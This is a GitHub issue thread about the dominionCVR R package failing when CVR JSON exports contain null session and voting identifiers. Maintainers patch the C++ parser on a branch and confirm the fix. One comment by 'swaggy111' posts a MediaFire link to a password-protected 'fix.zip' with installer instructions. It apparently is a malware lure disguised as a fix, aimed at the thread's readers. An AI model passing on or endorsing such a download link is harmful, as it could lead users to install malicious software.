### ISSUE TITLE
Support `null` values in VotingSessionIdentifier and UniqueVotingIdentifier

### ISSUE THREAD

**Issue by mreece13** [kuriwaki/dominionCVR#10]
https://github.com/kuriwaki/dominionCVR/blob/3bc9ef7d26a54602ef85d59aa7881a1061eda88d/src/extract_marks.cpp#L50C1-L51C63

Some outputted JSON files (e.g., Dickinson, Iowa) have a `null` for VotingSessionIdentifier and UniqueVotingIdentifier instead of strings, which is cause the `extract_marks` function to fail with a type error, see the highlighted area above. It would be great if the code could be updated to allow for `null`.

One easy adjustment is to just drop these fields, since they are unused later in the CVR cleaning script.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JeffreyBLewis** [comment]
We currently don't even return those fields from `count_marks`, so we could comment out the offending lines that extract them (and the containers that store them).  However, should we ever want to get them, I have instead added a few lines to `extract_marks.cpp` that handle the case when those fields are omitted.  That fix is in the branch dominionCVR/null-session-id.   I didn't have the CVRs that @mreece13  referenced handy, so I am not sure that my fix will work for that case, but it should.   If it does, let me know and I will make a pull request.

**Comment by mreece13** [comment]
It does not appear to have worked when I load the package on the branch using `devtools:load_all()`, but possible I did something wrong loading the dev version of the package in. The single .json can be found [here](https://votedatabase.com/cvr/Iowa/Dickenson/), Dickinson is one of those counties that did not split their export up into hundreds of smaller files.

**Comment by JeffreyBLewis** [comment]
Thanks for the file.  I see.  The fields are present in the `CvrExport.json`, but they are recorded as null rather than "" or some actual value.  I will get that sorted out.

**Comment by JeffreyBLewis** [comment]
I just pushed a new commit to the same branch [84e0b36](https://github.com/kuriwaki/dominionCVR/commit/84e0b36f66f669196bc9ab17ba77d9a951b9b52e).   It worked on Dickinson for me.

**Comment by mreece13** [comment]
Great me too, thanks for fixing!

**Comment by JeffreyBLewis** [comment]
Addressed in #11.
